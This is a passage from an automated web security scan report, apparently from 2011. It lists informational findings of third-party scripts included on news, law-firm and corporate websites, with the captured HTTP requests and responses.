http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_engine_c.js
http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.js?article
http://js.revsci.net/gateway/gw.js?csid=K05539
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://static.newstogram.com/bloomberg-v3/js/histogram.js
http://www.googletagservices.com/tag/static/google_services.js

Request

GET /news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html HTTP/1.1
Host: www.bloomberg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; profFbannerad=1; prodFbannerad=1; opt=no-opt; __utma=30057196.790518761.1303930135.1303930135.1303930135.1; __utmv=30057196.|3=opt=no-opt=1,; rsi_segs=K05539_10529|K05539_10592; _chartbeat2=05vt53emlalrxzsu

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Vary: Accept-Encoding
ETag: W/"683e1b09b50f1132fee8e0b7794a5e52"
X-runtime: 1022
Content-Type: text/html; charset=utf-8
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: private, max-age=356
Date: Thu, 12 May 2011 11:37:04 GMT
Connection: close
Content-Length: 57400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</script>

<script src="http://cdn.gotraffic.net/v/20110510_141513/javascripts/main_f-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.googletagservices.com/tag/static/google_services.js" type="text/javascript"></script>
...[SNIP]...
<li class="linkedin ">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</ul>

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="bloomberg-horizontal-rbox">
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.js?article"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.newstogram.com/bloomberg-v3/js/histogram.js"></script>
...[SNIP]...
</noscript>
<script src="http://cdn.gotraffic.net/v/20110510_141513/javascripts/s_code_p-min.js" type="text/javascript"></script>
<link href="http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_style.css" media="screen" rel="stylesheet" type="text/css" /> <script src="http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_engine_c.js" type="text/javascript"></script> <script src="http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_conf_en-US_inline.js" type="text/javascript"></script>
<script src="http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_conf_en-US_inline_stories.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=K05539"></script>
...[SNIP]...

20.14. http://www.butlerrubin.com/web/br.nsf/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/index

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.15. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /web/br.nsf/web/br.nsf/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.16. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /web/br.nsf/web/br.nsf/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

20.17. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /web/br.nsf/web/br.nsf/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

20.18. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /web/br.nsf/web/br.nsf/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

20.19. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /web/br.nsf/web/br.nsf/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

20.20. http://www.carlyle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carlyle.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.carlyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 13420
Content-Type: text/html
Content-Location: http://www.carlyle.com/index.html
Last-Modified: Mon, 09 May 2011 16:36:59 GMT
Accept-Ranges: bytes
ETag: "cf5b2d5167ecc1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:41:08 GMT

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="Keywords" content=""/>
<meta name="Description" content=""/>
<meta content="no-cache" http-
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.21. http://www.carlyle.com/Contact/item7607.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carlyle.com
Path:	/Contact/item7607.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /Contact/item7607.html HTTP/1.1
Host: www.carlyle.com
Proxy-Connection: keep-alive
Referer: http://www.carlyle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186619067.604400709.1305200382.1305200382.1305200382.1; __utmb=186619067; __utmc=186619067; __utmz=186619067.1305200382.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 26064
Content-Type: text/html
Last-Modified: Mon, 09 May 2011 16:23:34 GMT
Accept-Ranges: bytes
ETag: "67b17c7165ecc1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:41:12 GMT

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="Keywords" content=""/>
<meta name="Description" content=""/>
<meta content="no-cache" http-
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.22. http://www.csscorp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csscorp.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://lfov.net/webrecorder/js/listen.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:11 GMT
Server: Apache/2.2.12 (Unix)
Set-Cookie: csscorp=173.193.214.243.1305201371350323; path=/; max-age=315360000; domain=.csscorp.com
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Global Information &
...[SNIP]...
</script>-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=csscorp"></script>
...[SNIP]...
</script>

<script src="http://lfov.net/webrecorder/js/listen.js" type="text/Javascript"></script>
...[SNIP]...

20.23. http://www.csscorp.com/contact-us/general-enquiry.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csscorp.com
Path:	/contact-us/general-enquiry.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://lfov.net/webrecorder/js/listen.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /contact-us/general-enquiry.php HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1; wp1090=UTCTDDDDDDTVYCAU

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:58:17 GMT
Server: Apache/2.2.12 (Unix)
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>General Enquiry -
...[SNIP]...
</script>-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=csscorp"></script>
...[SNIP]...
</script>

<script src="http://lfov.net/webrecorder/js/listen.js" type="text/Javascript"></script>
...[SNIP]...

20.24. http://www.csscorp.com/page-not-found.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csscorp.com
Path:	/page-not-found.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://lfov.net/webrecorder/js/listen.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /page-not-found.php HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/contact-us/general-enquiry.php
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1; wp1090=UTCTDDDDDDTVYCAU

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:58:22 GMT
Server: Apache/2.2.12 (Unix)
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CSS Corp - We are so
...[SNIP]...
</script>-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=csscorp"></script>
...[SNIP]...
</script>

<script src="http://lfov.net/webrecorder/js/listen.js" type="text/Javascript"></script>
...[SNIP]...

20.25. http://www.elawmarketing.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elawmarketing.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /about HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/contact-us
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:04:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:04:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 11088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.26. http://www.elawmarketing.com/about/clients previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elawmarketing.com
Path:	/about/clients

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /about/clients HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1
If-Modified-Since: Thu, 12 May 2011 12:00:43 GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:00:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.27. http://www.elawmarketing.com/about/staff previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elawmarketing.com
Path:	/about/staff

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /about/staff HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/about/clients
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:08:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:08:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.28. http://www.elawmarketing.com/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elawmarketing.com
Path:	/contact-us

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /contact-us HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:03:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:04:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 26710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.29. http://www.elawmarketing.com/resources/reports/top-10-seo-best-practices-law-firm-websites-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elawmarketing.com
Path:	/resources/reports/top-10-seo-best-practices-law-firm-websites-0

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /resources/reports/top-10-seo-best-practices-law-firm-websites-0 HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:01:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 11950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.30. http://www.elawmarketing.com/services/websites previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elawmarketing.com
Path:	/services/websites

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /services/websites HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:04:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Thu, 12 May 2011 12:04:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.31. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

Response

20.32. http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxbusiness.com
Path:	/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/

Issue detail

The response dynamically includes the following script from another domain:

http://ads.foxnews.com/js/ad.js

Request

